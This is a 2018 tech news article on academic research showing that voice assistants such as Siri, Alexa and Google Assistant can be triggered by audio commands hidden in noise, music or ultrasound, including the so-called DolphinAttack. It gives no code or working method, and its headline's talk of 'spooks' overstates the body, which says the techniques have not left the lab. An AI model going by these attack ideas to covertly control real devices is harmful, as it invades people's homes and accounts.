Published in AI

Chinese and US spooks use sound to control AI assistants

by on11 May 2018


A spy in your house

For two years, researchers in China and the United States have begun demonstrating that they can send hidden commands that are undetectable to the human ear to Apple’s Siri, Amazon’s Alexa and Google’s Assistant.

According to SFGate,the researchers have been able to secretly activate the artificial intelligence systems on smartphones and smart speakers, making them dial phone numbers or open websites.

This means that the spooks could use the tech to unlock doors, wire money or buy stuff online or listen in.

A group of students from University of California, Berkeley, and Georgetown University showed in 2016 that they could hide commands in white noise played over loudspeakers and through YouTube videos to get smart devices to turn on airplane mode or open a website.

Some of those Berkeley researchers published a research paper that said that they could embed commands directly into recordings of music or spoken text. So while a human listener hears someone talking or an orchestra playing, Amazon’s Echo speaker might hear an instruction to add something to your shopping list.

Nicholas Carlini, a fifth-year Ph.D. student in computer security at UC Berkeley and one of the paper’s authors, said that there was no evidence that the techniques have left the lab, it may only be a matter of time before someone starts exploiting them.

The researchers are exploiting the gap between human and machine speech recognition. Speech recognition systems typically translate each sound to a letter, eventually compiling those into words and phrases. By making slight changes to audio files, researchers were able to cancel out the sound that the speech recognition system was supposed to hear and replace it with a sound that would be transcribed differently by machines while being nearly undetectable to the human ear.

The more voice activated toys appear on the market the more dangerious the hack is going to be. Smartphones and smart speakers that use digital assistants such as Amazon’s Alexa or Apple’s Siri are set to outnumber people by 2021, according to the research firm Ovum. And more than half of all US households will have at least one smart speaker by then, according to Juniper Research.

Amazon said that it doesn’t disclose specific security measures, but it has taken steps to ensure its Echo smart speaker is secure. Google said that security is an ongoing focus and that its Assistant has features to mitigate undetectable audio commands. Both companies’ assistants employ voice recognition technology to prevent devices from acting on certain commands unless they recognize the user’s voice.

Apple said its smart speaker, HomePod, is designed to prevent commands from doing things like unlocking doors, and it noted that iPhones and iPads must be unlocked before Siri will act on commands that access sensitive data or open apps and websites, among other measures. This is assuming that all Apple fanboys leave their phones locked, which is optimistic.

The technique, which the Chinese researchers called DolphinAttack, can instruct smart devices to visit malicious websites, initiate phone calls, take a picture or send text messages. While DolphinAttack has its limitations — the transmitter must be close to the receiving device — experts warned that more powerful ultrasonic systems were possible.

Researchers at the University of Illinois at Urbana-Champaign have managed to carry out an ultrasound attacks from 25 feet away. While the commands couldn’t penetrate walls, they could control smart devices through open windows from outside a building.

Last modified on 11 May 2018
Rate this item
(0 votes)

Read more about: